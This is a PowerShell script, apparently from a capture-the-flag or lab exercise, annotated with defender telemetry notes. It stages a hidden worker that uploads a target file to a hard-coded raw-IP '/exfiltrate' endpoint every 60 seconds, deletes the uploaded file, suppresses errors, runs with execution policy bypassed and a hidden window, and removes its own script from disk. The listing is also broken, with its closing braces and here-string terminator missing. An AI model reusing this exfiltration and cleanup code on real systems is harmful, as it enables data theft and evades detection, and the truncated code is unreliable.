# Purpose: stage a background PowerShell worker that repeatedly POSTs the file
# named by $filePath to $serverUrl and deletes the local copy after each upload.
# Flow: (1) hold the worker script in a string, (2) write it to %TEMP%,
# (3) launch it hidden in a separate powershell.exe, (4) delete the script file.
#
# Defender notes:
# - The destination is plain HTTP to a raw IP on a non-standard port, so the
#   request and the uploaded body are visible to proxy / network inspection.
# - The target file is removed once uploaded, so triage should lean on network
#   and process telemetry rather than on the file still being on disk.
$filePath = "$env:TEMP\flag.txt"
$serverUrl = "http://18.157.68.73:11858/exfiltrate"
# Worker script, held in a single-quoted here-string (nothing is expanded at
# definition time; the values arrive through the worker's own param() block).
# What the worker does, per the lines below:
# - UploadFile creates a System.Net.WebClient and sets User-Agent "Mozilla/5.0"
#   and Content-Type "text/plain".
# - If $path exists: POSTs it with UploadFile, then runs Remove-Item -Force on it.
# - Otherwise: POSTs the literal string "No Flag file".
# - The catch block holds only commented-out output, so any error is discarded.
# - A while ($true) loop repeats the attempt with a 60-second sleep.
# NOTE(review): as listed, the closing braces for finally / the function / the
# loop and the here-string terminator ('@) are absent, presumably lost when the
# page was extracted; the script does not parse in this form.
$scriptContent = @'
param($filePath, $serverUrl)
function UploadFile {
param($path, $url)
try {
$webClient = New-Object System.Net.WebClient
$webClient.Headers.Add("User-Agent", "Mozilla/5.0")
$webClient.Headers.Add("Content-Type", "text/plain")
if (Test-Path $path) {
#Write-Host "[*] Uploading file: $path"
$webClient.UploadFile($url, "POST", $path)
#Write-Host "[+] File uploaded successfully!"
Remove-Item -Path $path -Force
} else {
#Write-Host "[!] No flag file found. Sending empty notification."
$webClient.UploadString($url, "POST", "No Flag file")
}
} catch {
#Write-Host "[!] Error: $($_.Exception.Message)"
} finally {
$webClient.Dispose()
while ($true) {
UploadFile -path $filePath -url $serverUrl
Start-Sleep -Seconds 60
# Write the worker script to %TEMP%\upload_script.ps1. This leaves an on-disk
# artifact that file-creation telemetry (e.g. Sysmon Event ID 11) can record.
$scriptPath = "$env:TEMP\upload_script.ps1"
$scriptContent | Set-Content -Path $scriptPath
# Launch the worker in a separate powershell.exe with -ExecutionPolicy Bypass and
# -WindowStyle Hidden. The script path, target file and destination URL are passed
# as arguments, so all three appear in process-creation logs that capture the
# command line (Security Event ID 4688 with command-line auditing, Sysmon Event ID 1).
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru
# Print the worker's process ID (the only output this launcher emits)
Write-Host "[*] Job started with PID: $($process.Id)"
# Wait one second, then delete the worker script from disk. The file is short-lived,
# so PowerShell script block logging (Event ID 4104), where enabled, is the more
# dependable record of what the worker contained.
Start-Sleep -Seconds 1
Remove-Item -Path $scriptPath -Force
#Write-Host "[*] Temporary script file deleted."